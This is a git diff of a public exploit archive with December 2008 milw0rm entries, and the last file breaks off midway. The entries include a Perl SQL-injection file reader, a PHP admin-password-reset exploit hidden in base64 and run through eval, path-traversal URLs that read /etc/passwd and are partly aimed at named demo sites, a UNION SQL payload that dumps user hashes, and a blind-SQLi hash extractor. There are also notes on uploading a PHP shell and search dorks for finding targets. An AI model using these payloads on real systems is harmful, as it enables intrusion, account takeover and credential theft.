+#[+] EOF
+#
+#
+
+
+use LWP::UserAgent;
+
+open(FILE, ">&STDOUT");
+
+my $host = $ARGV[0];
+my $file = $ARGV[1];
+
+die &_USO unless $ARGV[1];
+
+sub _USO
+{
+    die "
+    MyPBS Remote SQL Injection Exploit
+
+    This exploit tries to read an
+    arbitrary file.
+  
+    usage: ./$0 <host> <file_you_want>
+    ex: ./$0 http://localhost/mypbs/ /etc/passwd
+
+    ";
+}
+
+my $ua = LWP::UserAgent->new() or die;
+$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1");
+
+my $tmp="0x";
+my $tmp2;
+
+foreach my $c (split(//, $file)){
+    $tmp2 = sprintf ("%x", ord($c));
+    $tmp .= $tmp2;
+}
+
+print FILE "[+] File HEX: ".$tmp."\n";
+
+if ($host !~ /\/$/){ $host .= "/"; }
+
+print FILE "[+] Host: ".$host."\n";
+
+my $req = HTTP::Request->new(GET => $host."index.php?seasonID=-1 union all select CONCAT(0x3c46494c453e,load_file(".$tmp."),0x3c46494c453e)");
+my $res = $ua->request($req);
+my $con = $res->content;
+
+my $ok = 0;
+open (OUT, ">result.txt");
+
+if ($res->is_success){
+    foreach my $linea (split(/\n/, $con)){
+        if($ok == 1){
+            if ($linea !~ /<FILE>/){
+                print FILE $linea."\n";
+        print OUT $linea."\n";
+            }else{
+                print FILE "\n[+] EOF\n";
+        print "\n[+] File saved into 'result.txt'\n";
+                goto salida;
+            }
+        }
+        if($linea =~ /<FILE>/i && $ok == 0){
+            $ok = 1;
+            print FILE "[+] File content: \n";
+        }
+    }
+    salida:
+    if ($ok == 0){
+        print FILE "[-] Exploit Failed!";
+    }      
+}
+else{
+    print FILE "[-] Exploit Failed!";
+}
+
+close(FILE);
+close(OUT);
+
+#EOF
+
+# milw0rm.com [2008-12-19]
diff --git a/platforms/php/webapps/7523.php b/platforms/php/webapps/7523.php
index 51ed06004..51cf68d1e 100755
--- a/platforms/php/webapps/7523.php
+++ b/platforms/php/webapps/7523.php
@@ -1,158 +1,158 @@
-<?php
-/*
-==============================================================================
-                      _      _       _          _      _   _ 
-                     / \    | |     | |        / \    | | | |
-                    / _ \   | |     | |       / _ \   | |_| |
-                   / ___ \  | |___  | |___   / ___ \  |  _  |
-   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
-                                                             
-==============================================================================
-	ReVou Twitter Clone Admin Password Changing Exploit
-==============================================================================
-	[»] Script:             [ ReVou Twitter Clone ]
-	[»] Language:           [ PHP, MySQL ]
-	[»] homepage:           [ http://www.revou.com/ ]
-	[»] Type:               [ Commercial ]
-	[»] found-report:       [ 14.12.2008-19.12.2008 ]
-	[»] Founder.coder:      [ G4N0K <mail.ganok[at]gmail.com> ]
-===[ NOTES ]===
-	[.] Reset pwd, login as ADMIN, use this path to upload your php-shell-script: http://site.tld/revou/adminlogin/index.php?id=dbimport
-	[.] your file is here: http://site.tld/revou/db_backup/shell.php
-===[ GGL-DORKS ]===
-	"Joined ReVou"
-	"Tell the world what you're doing at this moment!"
-	"days ago from web" "RSS feed" "API"
-	...
-===[ LIVE ]===
-	[»] http://www.revou.com/demo/
-===[ Greetz ]===
-	[»] ALLAH
-	[»] rgod <- WTF, you dont know him...!
-	[»] Tornado2800, B13, AFSHIN-ZARBAT, QU1E, Hussain-X, "SauDi L0rD", Sakab ...
-	[»] Oops I forgot someone -> Str0ke, Keep-it-up Brotha :-)
-	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
-	//ALLAH,fo-gimme...
-*/
-
-error_reporting(E_ALL);
-echo <<<HTML
-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
-<html xmlns="http://www.w3.org/1999/xhtml">
-<head>
-<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
-<title>ReVou Twitter Clone Admin Password Changing Exploit | G4N0K
-
-
-
-
    
-
    -==============================================================================
-                      _      _       _          _      _   _                  
-                     / \    | |     | |        / \    | | | |                 
-                    / _ \   | |     | |       / _ \   | |_| |                 
-                   / ___ \  | |___  | |___   / ___ \  |  _  |                 
-   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|                 
-                                                                              
-                                                                              
-==============================================================================
-                      ____   _  _     _   _    ___    _  __                   
-                     / ___| | || |   | \ | |  / _ \  | |/ /                   
-                    | |  _  | || |_  |  \| | | | | | | ' /                    
-                    | |_| | |__   _| | |\  | | |_| | | . \                    
-         Exploit By  \____|    |_|   |_| \_|  \___/  |_|\_\                   
-                                                                              
-==============================================================================
-ReVou Twitter Clone Admin Password Changing Exploit
-==============================================================================
-
    
-HTML;
-$FORM= <<
-
    
-Path ex: /script/
-	
    
-	 E x p l o i t 
    
-	
    • 
-	
      • 
-	
    • 
-	
      • 
-	
    • 
-	
      • 
-	
    • 
-	

    • 
-	

    
-	
-	
    
-
-

    
-
-FFF;
-
-$GNK = "aWYgKGlzc2V0KCRfUE9TVFsnZ29fR05LJ10pICYmIGlzc2V0KCRfUE9TVFsidXJpX0dOSyJdKSAm".
-       "JiAhZW1wdHkoJF9QT1NUWyJ1cmlfR05LIl0pICYmIGlzc2V0KCRfUE9TVFsicGF0aF9HTksiXSkg".
-       "JiYgIWVtcHR5KCRfUE9TVFsicGF0aF9HTksiXSkgJiYgaXNzZXQoJF9QT1NUWyJud3B3ZF9HTksi".
-       "XSkgJiYgIWVtcHR5KCRfUE9TVFsibndwd2RfR05LIl0pKSB7JHBzdCA9ICJuZXdwYXNzMT0iLiRf".
-       "UE9TVFsnbndwd2RfR05LJ10uIiZuZXdwYXNzMj0iLiRfUE9TVFsnbndwd2RfR05LJ10uIiZvaz1D".
-       "aGFuZ2UiOyRjaGVuY2hvayA9IHN0cmxlbigkcHN0KTskam9rZSA9ICJQT1NUICIuJF9QT1NUWyJw".
-       "YXRoX0dOSyJdLiIvYWRtaW5sb2dpbi9wYXNzd29yZC5waHAgSFRUUC8xLjFcclxuSG9zdDogIi4k".
-       "X1BPU1RbInVyaV9HTksiXS4iXHJcblVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzOyBV".
-       "OyBXaW5kb3dzIE5UIDUuMTsgZW4tVVM7IHJ2OjEuOSkgR2Vja28vMjAwODA1MjkwNiBGaXJlZm94".
-       "LzMuMFxyXG5LZWVwLUFsaXZlOiAzMDBcclxuQ29ubmVjdGlvbjoga2VlcC1hbGl2ZVxyXG5Db250".
-       "ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZFxyXG5Db250ZW50LUxl".
-       "bmd0aDogIi4kY2hlbmNob2suIlxyXG5cclxuIjskam9rZSAuPSAkcHN0LiJcclxuIjskcmVzID0g".
-       "IiI7JGF0dGFjayA9IGZzb2Nrb3BlbigkX1BPU1RbInVyaV9HTksiXSwkX1BPU1RbInBvcnRfR05L".
-       "Il0sJGVycm5vLCAkZXJyc3RyLCA1MCk7aWYoISRhdHRhY2spe2VjaG8oIjxiciAvPjxiPndoYXQg".
-       "YXJlIHlhIGRvaW5nLi4uISA8YnIgLz5TdW10aGluZyB3ZW50IHdyb25nLi4uISA8L2I+PGJyIC8+".
-       "PGJyIC8+PC9kaXY+Iik7fWVjaG8oIjxkaXYgc3R5bGU9XCJmb250Om5vcm1hbCA4cHQgdGFob21h".
-       "O3BhZGRpbmctbGVmdDo1MHB4O1wiPlsrXSA8Yj5Db25uZWN0ZWQuLi48YnIvPjwvYj5bK10gPGI+".
-       "U2VuZGluZyByZXF1ZXN0Li4uPGJyLz48L2I+Iik7ZndyaXRlKCRhdHRhY2ssJGpva2UpO3doaWxl".
-       "KCFmZW9mKCRhdHRhY2spKXskcmVzLj1mZ2V0cygkYXR0YWNrKTt9ZmNsb3NlKCRhdHRhY2spO2lm".
-       "IChzdHJpc3RyKCRyZXMsICJzdWNjZXNzZnVsbHkiKSl7ZWNobyAiWytdPGI+IEV4cGxvaXRlZCAh".
-       "IDwvYj48YnIgLz5bK10gPGI+PGZvbnQgY29sb3I9XCJyZWRcIj5wYXNzd29yZCBjaGFuZ2VkLi4u".
-       "PC9iPjwvZm9udD48YnIgLz5bK10gPGI+TmV3IHBhc3N3b3JkIGlzIDogIi4kX1BPU1RbIm53cHdk".
-       "X0dOSyJdLiI8L2I+IDxiciAvPlsrXTxiPiBhZG1pbiBwYW5lbDo8L2I+IDxhIGhyZWY9XCJodHRw".
-       "Oi8vIi4kX1BPU1RbInVyaV9HTksiXS4kX1BPU1RbInBhdGhfR05LIl0uImFkbWlubG9naW4vXCI+".
-       "IGh0dHA6Ly8iLiRfUE9TVFsidXJpX0dOSyJdLiRfUE9TVFsicGF0aF9HTksiXS4iYWRtaW5sb2dp".
-       "bi88L2E+PGJyIC8+PGJyIC8+PGJyIC8+PGJyIC8+PGJyIC8+PGJyIC8+PGJyIC8+PHNwYW4gc3R5".
-       "bGU9XCJmb250Om5vcm1hbCA4cHQgdGFob21hO2NvbG9yOiNDQ0M7XCI+RXhwbG9pdCBCeSBHNE4w".
-       "Sy4uLjwvc3Bhbj48YnIgLz48YnIgLz48L2Rpdj4iO30gZWxzZSB7IGVjaG8gIlsrXTxiPiBPb3Bz".
-       "ICwgIHNyeSAsICA8dT5ub3QgVnVsbmVyYWJsZTwvdT4gLiAuIC4gITwvYj48YnIgLz48YnIgLz48".
-       "L2Rpdj4iO31mbHVzaCgpOyB9IGVsc2UgeyBlY2hvICRGT1JNO30=";eval(base64_decode($GNK));
-?>
-
-# milw0rm.com [2008-12-19]
+ ]
+===[ NOTES ]===
+	[.] Reset pwd, login as ADMIN, use this path to upload your php-shell-script: http://site.tld/revou/adminlogin/index.php?id=dbimport
+	[.] your file is here: http://site.tld/revou/db_backup/shell.php
+===[ GGL-DORKS ]===
+	"Joined ReVou"
+	"Tell the world what you're doing at this moment!"
+	"days ago from web" "RSS feed" "API"
+	...
+===[ LIVE ]===
+	[»] http://www.revou.com/demo/
+===[ Greetz ]===
+	[»] ALLAH
+	[»] rgod <- WTF, you dont know him...!
+	[»] Tornado2800, B13, AFSHIN-ZARBAT, QU1E, Hussain-X, "SauDi L0rD", Sakab ...
+	[»] Oops I forgot someone -> Str0ke, Keep-it-up Brotha :-)
+	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
+	//ALLAH,fo-gimme...
+*/
+
+error_reporting(E_ALL);
+echo <<
+
+
+
+ReVou Twitter Clone Admin Password Changing Exploit | G4N0K
+
+
+
+
    
+
    +==============================================================================
+                      _      _       _          _      _   _                  
+                     / \    | |     | |        / \    | | | |                 
+                    / _ \   | |     | |       / _ \   | |_| |                 
+                   / ___ \  | |___  | |___   / ___ \  |  _  |                 
+   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|                 
+                                                                              
+                                                                              
+==============================================================================
+                      ____   _  _     _   _    ___    _  __                   
+                     / ___| | || |   | \ | |  / _ \  | |/ /                   
+                    | |  _  | || |_  |  \| | | | | | | ' /                    
+                    | |_| | |__   _| | |\  | | |_| | | . \                    
+         Exploit By  \____|    |_|   |_| \_|  \___/  |_|\_\                   
+                                                                              
+==============================================================================
+ReVou Twitter Clone Admin Password Changing Exploit
+==============================================================================
+
    
+HTML;
+$FORM= <<
+
    
+Path ex: /script/
+	
    
+	 E x p l o i t 
    
+	
    • 
+	
      • 
+	
    • 
+	
      • 
+	
    • 
+	
      • 
+	
    • 
+	

    
+	


    
+	
+	
    
+
    
+

    
+
+FFF;
+
+$GNK = "aWYgKGlzc2V0KCRfUE9TVFsnZ29fR05LJ10pICYmIGlzc2V0KCRfUE9TVFsidXJpX0dOSyJdKSAm".
+       "JiAhZW1wdHkoJF9QT1NUWyJ1cmlfR05LIl0pICYmIGlzc2V0KCRfUE9TVFsicGF0aF9HTksiXSkg".
+       "JiYgIWVtcHR5KCRfUE9TVFsicGF0aF9HTksiXSkgJiYgaXNzZXQoJF9QT1NUWyJud3B3ZF9HTksi".
+       "XSkgJiYgIWVtcHR5KCRfUE9TVFsibndwd2RfR05LIl0pKSB7JHBzdCA9ICJuZXdwYXNzMT0iLiRf".
+       "UE9TVFsnbndwd2RfR05LJ10uIiZuZXdwYXNzMj0iLiRfUE9TVFsnbndwd2RfR05LJ10uIiZvaz1D".
+       "aGFuZ2UiOyRjaGVuY2hvayA9IHN0cmxlbigkcHN0KTskam9rZSA9ICJQT1NUICIuJF9QT1NUWyJw".
+       "YXRoX0dOSyJdLiIvYWRtaW5sb2dpbi9wYXNzd29yZC5waHAgSFRUUC8xLjFcclxuSG9zdDogIi4k".
+       "X1BPU1RbInVyaV9HTksiXS4iXHJcblVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzOyBV".
+       "OyBXaW5kb3dzIE5UIDUuMTsgZW4tVVM7IHJ2OjEuOSkgR2Vja28vMjAwODA1MjkwNiBGaXJlZm94".
+       "LzMuMFxyXG5LZWVwLUFsaXZlOiAzMDBcclxuQ29ubmVjdGlvbjoga2VlcC1hbGl2ZVxyXG5Db250".
+       "ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZFxyXG5Db250ZW50LUxl".
+       "bmd0aDogIi4kY2hlbmNob2suIlxyXG5cclxuIjskam9rZSAuPSAkcHN0LiJcclxuIjskcmVzID0g".
+       "IiI7JGF0dGFjayA9IGZzb2Nrb3BlbigkX1BPU1RbInVyaV9HTksiXSwkX1BPU1RbInBvcnRfR05L".
+       "Il0sJGVycm5vLCAkZXJyc3RyLCA1MCk7aWYoISRhdHRhY2spe2VjaG8oIjxiciAvPjxiPndoYXQg".
+       "YXJlIHlhIGRvaW5nLi4uISA8YnIgLz5TdW10aGluZyB3ZW50IHdyb25nLi4uISA8L2I+PGJyIC8+".
+       "PGJyIC8+PC9kaXY+Iik7fWVjaG8oIjxkaXYgc3R5bGU9XCJmb250Om5vcm1hbCA4cHQgdGFob21h".
+       "O3BhZGRpbmctbGVmdDo1MHB4O1wiPlsrXSA8Yj5Db25uZWN0ZWQuLi48YnIvPjwvYj5bK10gPGI+".
+       "U2VuZGluZyByZXF1ZXN0Li4uPGJyLz48L2I+Iik7ZndyaXRlKCRhdHRhY2ssJGpva2UpO3doaWxl".
+       "KCFmZW9mKCRhdHRhY2spKXskcmVzLj1mZ2V0cygkYXR0YWNrKTt9ZmNsb3NlKCRhdHRhY2spO2lm".
+       "IChzdHJpc3RyKCRyZXMsICJzdWNjZXNzZnVsbHkiKSl7ZWNobyAiWytdPGI+IEV4cGxvaXRlZCAh".
+       "IDwvYj48YnIgLz5bK10gPGI+PGZvbnQgY29sb3I9XCJyZWRcIj5wYXNzd29yZCBjaGFuZ2VkLi4u".
+       "PC9iPjwvZm9udD48YnIgLz5bK10gPGI+TmV3IHBhc3N3b3JkIGlzIDogIi4kX1BPU1RbIm53cHdk".
+       "X0dOSyJdLiI8L2I+IDxiciAvPlsrXTxiPiBhZG1pbiBwYW5lbDo8L2I+IDxhIGhyZWY9XCJodHRw".
+       "Oi8vIi4kX1BPU1RbInVyaV9HTksiXS4kX1BPU1RbInBhdGhfR05LIl0uImFkbWlubG9naW4vXCI+".
+       "IGh0dHA6Ly8iLiRfUE9TVFsidXJpX0dOSyJdLiRfUE9TVFsicGF0aF9HTksiXS4iYWRtaW5sb2dp".
+       "bi88L2E+PGJyIC8+PGJyIC8+PGJyIC8+PGJyIC8+PGJyIC8+PGJyIC8+PGJyIC8+PHNwYW4gc3R5".
+       "bGU9XCJmb250Om5vcm1hbCA4cHQgdGFob21hO2NvbG9yOiNDQ0M7XCI+RXhwbG9pdCBCeSBHNE4w".
+       "Sy4uLjwvc3Bhbj48YnIgLz48YnIgLz48L2Rpdj4iO30gZWxzZSB7IGVjaG8gIlsrXTxiPiBPb3Bz".
+       "ICwgIHNyeSAsICA8dT5ub3QgVnVsbmVyYWJsZTwvdT4gLiAuIC4gITwvYj48YnIgLz48YnIgLz48".
+       "L2Rpdj4iO31mbHVzaCgpOyB9IGVsc2UgeyBlY2hvICRGT1JNO30=";eval(base64_decode($GNK));
+?>
+
+# milw0rm.com [2008-12-19]
diff --git a/platforms/php/webapps/7524.txt b/platforms/php/webapps/7524.txt
index 8ffc7f7aa..3a6877e81 100755
--- a/platforms/php/webapps/7524.txt
+++ b/platforms/php/webapps/7524.txt
@@ -1,22 +1,22 @@
-Online Keyword Research (download.php filename) Local File Include
-
-# author : Cold z3ro, http://www.hackteach.org/
-# script : http://secure.emetrix.com/order/product.asp?PID=68900247
-# demo   : http://www.rightscripts.com/keywordresearch/
-
-
-# Exploit
-
-[~] http://www.site.com/[path]/download.php?filename=../../../../../../../../etc/passwd
-
-
-# Example
-
-[~] http://www.rightscripts.com/keywordresearch/download.php?filename=../../../../../../../../etc/passwd
-
-
-
-============================
-Greetz : www.hackteach.org members , AnGeL25dZ
-
-# milw0rm.com [2008-12-19]
+Online Keyword Research (download.php filename) Local File Include
+
+# author : Cold z3ro, http://www.hackteach.org/
+# script : http://secure.emetrix.com/order/product.asp?PID=68900247
+# demo   : http://www.rightscripts.com/keywordresearch/
+
+
+# Exploit
+
+[~] http://www.site.com/[path]/download.php?filename=../../../../../../../../etc/passwd
+
+
+# Example
+
+[~] http://www.rightscripts.com/keywordresearch/download.php?filename=../../../../../../../../etc/passwd
+
+
+
+============================
+Greetz : www.hackteach.org members , AnGeL25dZ
+
+# milw0rm.com [2008-12-19]
diff --git a/platforms/php/webapps/7525.txt b/platforms/php/webapps/7525.txt
index 3889dcc69..7aa1b8857 100755
--- a/platforms/php/webapps/7525.txt
+++ b/platforms/php/webapps/7525.txt
@@ -1,26 +1,26 @@
-Extract Website (download.php filename) Local File Include
-
-# author : Cold z3ro, http://www.hackteach.org/
-# script : http://secure.emetrix.com/order/product.asp?PID=74332316
-# demo   : http://www.rightscripts.com/extractwebsite/
-# about  : This tool help you extract web data include URL links,
-       domain names, contact emails, keywords, meta tags, page titles
-       or text from other website.
-       You can extract these data from a list of website links or from simple text.
-
-
-# Exploit
-
-[~] http://www.site.com/[path]/download.php?filename=../../../../../../../../etc/passwd
-
-
-
-# Example
-
-[~] http://www.rightscripts.com/extractwebsite/download.php?filename=../../../../../../../../etc/passwd
-
-
-==================================
-Greetz : www.hackteach.org members , AnGeL25dZ
-
-# milw0rm.com [2008-12-19]
+Extract Website (download.php filename) Local File Include
+
+# author : Cold z3ro, http://www.hackteach.org/
+# script : http://secure.emetrix.com/order/product.asp?PID=74332316
+# demo   : http://www.rightscripts.com/extractwebsite/
+# about  : This tool help you extract web data include URL links,
+       domain names, contact emails, keywords, meta tags, page titles
+       or text from other website.
+       You can extract these data from a list of website links or from simple text.
+
+
+# Exploit
+
+[~] http://www.site.com/[path]/download.php?filename=../../../../../../../../etc/passwd
+
+
+
+# Example
+
+[~] http://www.rightscripts.com/extractwebsite/download.php?filename=../../../../../../../../etc/passwd
+
+
+==================================
+Greetz : www.hackteach.org members , AnGeL25dZ
+
+# milw0rm.com [2008-12-19]
diff --git a/platforms/php/webapps/7526.txt b/platforms/php/webapps/7526.txt
index c36bc16c1..ebd92d4a5 100755
--- a/platforms/php/webapps/7526.txt
+++ b/platforms/php/webapps/7526.txt
@@ -1,76 +1,76 @@
-[START]
-
-####################################################################################################################
-[0x01] Informations:
-
-Script         : myPHPscripts Login Session 2.0
-Download       : http://www.hotscripts.com/jump.php?listing_id=69881&jump_type=1
-Vulnerability  : XSS / Database Disclosure
-Author         : Osirys
-Contact        : osirys[at]live[dot]it
-Website        : http://osirys.org
-Notes          : Proud to be Italian
-Greets:        : XaDoS, x0r, emgent, Jay, str0ke, Todd and AlpHaNiX
-
-
-####################################################################################################################
-[0x02] Bug: [XSS]
-######
-
-Bugged file is: /[path]/login.php
-
-[CODE]
-
-if ($u_invalid == 1) { $errors[] = "User $user is invalid. 3-15 alphanumeric characters required."; }
-
-[/CODE]
-
-If the username that we typed in the register form is invalid, it will directly appear in the html code.
-So we just have to put a js code, like an alert, and we will get a XSS.
-
-[!] FIX: Filter or validate $user before printing it in html code.
-
-
-[!] EXPLOIT: 
-             1) Go at: /[path]/login.php?ls_register
-             2) In User form put a js code. (ex: )
-             3) Field the other forms, and press register button.
-
-####################################################################################################################
-[0x03] Bug: [Database Disclosure]
-######
-
-Bugged file is: /[path]/login.php
-
-[CODE]
-
-	if (empty($errors)) {
-		$newline = $records++;
-		$e_email = base64_encode($email);
-		$data = "$newline||$user||$e_email||$pass\n";
-		$fh = fopen($users, 'a') or die("Can't open user database.");
-		fwrite($fh, $data);
-		fclose($fh);
-?>
-
-[/CODE]
-
-This cms uses a flat database, a .txt file where it stores usernames,passwords and emails of the registered
-users.
-
-[!] FIX: Don't use this kind of authentication :)
-
-
-[!] EXPLOIT: /[path]/users.txt
-
-             Informations are printed in this way:
-             0||admin||b3NpcnlzQGxpdmUuaXQ=||6e1459df459890dfd8b4c3687c18abba
-             1||cazzone||bG9sQGxvbC5pdA==||b7dba5a1bc3605a87b59ac8147512c97
-
-             user_number||username||email(base64 encrypted)||password(md5 encrypted)
-
-####################################################################################################################
-
-[/END]
-
-# milw0rm.com [2008-12-19]
+[START]
+
+####################################################################################################################
+[0x01] Informations:
+
+Script         : myPHPscripts Login Session 2.0
+Download       : http://www.hotscripts.com/jump.php?listing_id=69881&jump_type=1
+Vulnerability  : XSS / Database Disclosure
+Author         : Osirys
+Contact        : osirys[at]live[dot]it
+Website        : http://osirys.org
+Notes          : Proud to be Italian
+Greets:        : XaDoS, x0r, emgent, Jay, str0ke, Todd and AlpHaNiX
+
+
+####################################################################################################################
+[0x02] Bug: [XSS]
+######
+
+Bugged file is: /[path]/login.php
+
+[CODE]
+
+if ($u_invalid == 1) { $errors[] = "User $user is invalid. 3-15 alphanumeric characters required."; }
+
+[/CODE]
+
+If the username that we typed in the register form is invalid, it will directly appear in the html code.
+So we just have to put a js code, like an alert, and we will get a XSS.
+
+[!] FIX: Filter or validate $user before printing it in html code.
+
+
+[!] EXPLOIT: 
+             1) Go at: /[path]/login.php?ls_register
+             2) In User form put a js code. (ex: )
+             3) Field the other forms, and press register button.
+
+####################################################################################################################
+[0x03] Bug: [Database Disclosure]
+######
+
+Bugged file is: /[path]/login.php
+
+[CODE]
+
+	if (empty($errors)) {
+		$newline = $records++;
+		$e_email = base64_encode($email);
+		$data = "$newline||$user||$e_email||$pass\n";
+		$fh = fopen($users, 'a') or die("Can't open user database.");
+		fwrite($fh, $data);
+		fclose($fh);
+?>
+
+[/CODE]
+
+This cms uses a flat database, a .txt file where it stores usernames,passwords and emails of the registered
+users.
+
+[!] FIX: Don't use this kind of authentication :)
+
+
+[!] EXPLOIT: /[path]/users.txt
+
+             Informations are printed in this way:
+             0||admin||b3NpcnlzQGxpdmUuaXQ=||6e1459df459890dfd8b4c3687c18abba
+             1||cazzone||bG9sQGxvbC5pdA==||b7dba5a1bc3605a87b59ac8147512c97
+
+             user_number||username||email(base64 encrypted)||password(md5 encrypted)
+
+####################################################################################################################
+
+[/END]
+
+# milw0rm.com [2008-12-19]
diff --git a/platforms/php/webapps/7527.txt b/platforms/php/webapps/7527.txt
index 2419f03fc..821f354e6 100755
--- a/platforms/php/webapps/7527.txt
+++ b/platforms/php/webapps/7527.txt
@@ -1,30 +1,30 @@
-################## Piker #######################################
-#
-#
-#    FreeLyrics Remote Source Code Disclosure Vulnerability
-#
-
-#
-#    Affected software: FreeLyrics
-#    Vendor: http://lyrics.sourceforge.net/
-#    Risk: Medium
-#
-################################################################
-
-#
-#    http://[target]/[path]/source.php?p=[FILE]
-#
-#   PoC: http://[target]/[path]/source.php?p=config.php
-#
-#   
-################################################################
-#
-#         Found by Piker [piker0x90(at)gmail(dot)com]
-
-#            D.O.M Labs - Security Researchers
-#           www.domlabs.org
-#
-#
-################################################################
-
-# milw0rm.com [2008-12-19]
+################## Piker #######################################
+#
+#
+#    FreeLyrics Remote Source Code Disclosure Vulnerability
+#
+
+#
+#    Affected software: FreeLyrics
+#    Vendor: http://lyrics.sourceforge.net/
+#    Risk: Medium
+#
+################################################################
+
+#
+#    http://[target]/[path]/source.php?p=[FILE]
+#
+#   PoC: http://[target]/[path]/source.php?p=config.php
+#
+#   
+################################################################
+#
+#         Found by Piker [piker0x90(at)gmail(dot)com]
+
+#            D.O.M Labs - Security Researchers
+#           www.domlabs.org
+#
+#
+################################################################
+
+# milw0rm.com [2008-12-19]
diff --git a/platforms/php/webapps/7529.txt b/platforms/php/webapps/7529.txt
index e7e91b0c8..a33d9066f 100755
--- a/platforms/php/webapps/7529.txt
+++ b/platforms/php/webapps/7529.txt
@@ -1,32 +1,32 @@
-Constructr CMS
-http://constructr-cms.org/
-
-- <= 3.02.5 "Stable" -
-
-magic_quotes_gpc = Off
-register_globals = On
-
-- Directory Traversal - Source Disclosure - Arbitrary File Creation - Etc Etc Etc -
-http://site/constructr/backend/template.php?edit_file=
-
-Db info:
-../config/config.inc.php
-
-
-- SQL -
-http://site/constructr/?show_page=
-
-User (urlencode) :
--0' UNION ALL SELECT NULL, CONCAT(CHAR(0),IFNULL(CAST(username AS CHAR(10000)), CHAR(32)),CHAR(0),IFNULL(CAST(hash AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL, NULL, NULL, NULL FROM constructr_user# AND 'tBkML'='tBkML
-"Hash" is the password, not really encrypted...
-
-
-- Timeline -
-Author notified: Dec 12
-Public Disclosure: Dec 19
-
-
-- Seasons Greetings -
-- http://nukeit.org -
-
-# milw0rm.com [2008-12-19]
+Constructr CMS
+http://constructr-cms.org/
+
+- <= 3.02.5 "Stable" -
+
+magic_quotes_gpc = Off
+register_globals = On
+
+- Directory Traversal - Source Disclosure - Arbitrary File Creation - Etc Etc Etc -
+http://site/constructr/backend/template.php?edit_file=
+
+Db info:
+../config/config.inc.php
+
+
+- SQL -
+http://site/constructr/?show_page=
+
+User (urlencode) :
+-0' UNION ALL SELECT NULL, CONCAT(CHAR(0),IFNULL(CAST(username AS CHAR(10000)), CHAR(32)),CHAR(0),IFNULL(CAST(hash AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL, NULL, NULL, NULL FROM constructr_user# AND 'tBkML'='tBkML
+"Hash" is the password, not really encrypted...
+
+
+- Timeline -
+Author notified: Dec 12
+Public Disclosure: Dec 19
+
+
+- Seasons Greetings -
+- http://nukeit.org -
+
+# milw0rm.com [2008-12-19]
diff --git a/platforms/php/webapps/7530.pl b/platforms/php/webapps/7530.pl
index fde85bd07..5a5090aff 100755
--- a/platforms/php/webapps/7530.pl
+++ b/platforms/php/webapps/7530.pl
@@ -1,86 +1,86 @@
-#!/usr/bin/perl -w
-
-use strict;
-use LWP::Simple;
-
-$| = 1;
-p
-print q {
-
-:::::::::::::::::::::::::::::
-:: Userlocator 3.0 Exploit ::
-::  written by katharsis   ::
-:::::::::::::::::::::::::::::
-
-[~] www.katharsis.x2.to
-[~] nebelfrost23@web.de
-
-};
-
-if (@ARGV < 2) {
- print "Usage: usrlocsploit.pl [url] [user id]\nExample: usrlocsploit.pl www.target.com 1\n";
- exit;
-}
-
-my $page = shift;
-my $uid  = shift;
-
-my $prefix;
-
-my @charset = ('a','b','c','d','e','f','1','2','3','4','5','6','7','8','9','0');
-
-print "[x] Vulnerability check...\n";
-
-my $chreq = get("http://".$page."/locator.php?action=get_user&y='");
-
-if (($chreq =~ m/Database error/i) || ($chreq =~ m/Invalid SQL/i)) { 
-
-print "[x] Seems to be vulnerable!\n";
-
-} else {
-
-print "[o] Seems to be patched, sorry\n";
-exit;
-
-}
-
-print "[^] Prefix check...\n";
-
-if ($chreq =~ m/(..._)wlw/i) {
-
- print "[^] Success, using Prefix '$1'\n";
- $prefix = $1;
-
-} else { 
- print "[o] Can't find prefix, using 'bb1_'\n";
- $prefix = "bb1";
-}
-
-print "[+] Getting hash...\n";
-print "[+] Hash: ";
-
-my $curnum = 1;
-
-while($curnum < 32) {
-
-my $false_result = get("http://".$page."/locator.php?action=get_user&x=233&y=365'/**/OR/**/ascii(substring((SELECT+password+FROM+".$prefix."users+WHERE+userid=".$uid."),".$curnum."))=-1/*");
-
-foreach(@charset) {
-
- my $ascode       = ord($_);
- my $result       = get("http://".$page."/locator.php?action=get_user&x=233&y=365'/**/OR/**/ascii(substring((SELECT+password+FROM+".$prefix."users+WHERE+userid=".$uid."),".$curnum."))=".$ascode."/*");
-
- if (length($result) != 0) {
-  if (length($result) != length($false_result)) {
-   print chr($ascode);
-   $curnum++;
-   }
-  }
- }
-}
-
-print "\n[+] Done!\n";
-
-# EOF
-
-# milw0rm.com [2008-12-21]
+#!/usr/bin/perl -w
+
+use strict;
+use LWP::Simple;
+
+$| = 1;
+p
+print q {
+
+:::::::::::::::::::::::::::::
+:: Userlocator 3.0 Exploit ::
+::  written by katharsis   ::
+:::::::::::::::::::::::::::::
+
+[~] www.katharsis.x2.to
+[~] nebelfrost23@web.de
+
+};
+
+if (@ARGV < 2) {
+ print "Usage: usrlocsploit.pl [url] [user id]\nExample: usrlocsploit.pl www.target.com 1\n";
+ exit;
+}
+
+my $page = shift;
+my $uid  = shift;
+
+my $prefix;
+
+my @charset = ('a','b','c','d','e','f','1','2','3','4','5','6','7','8','9','0');
+
+print "[x] Vulnerability check...\n";
+
+my $chreq = get("http://".$page."/locator.php?action=get_user&y='");
+
+if (($chreq =~ m/Database error/i) || ($chreq =~ m/Invalid SQL/i)) { 
+
+print "[x] Seems to be vulnerable!\n";
+
+} else {
+
+print "[o] Seems to be patched, sorry\n";
+exit;
+
+}
+
+print "[^] Prefix check...\n";
+
